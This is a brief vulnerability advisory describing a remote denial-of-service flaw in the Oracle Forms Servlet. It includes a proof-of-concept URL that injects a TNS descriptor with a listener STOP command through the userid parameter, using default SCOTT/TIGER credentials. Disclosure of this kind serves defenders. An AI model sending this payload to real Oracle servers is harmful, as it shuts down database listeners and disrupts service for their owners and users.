Oracle Forms Servlet TLS Listener Remote Denial Of Service Vulnerability

Oracle Forms Servlet TLS Listener Remote Denial Of Service Vulnerability

An exploit is not required.

The following proof of concept example is available:

http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES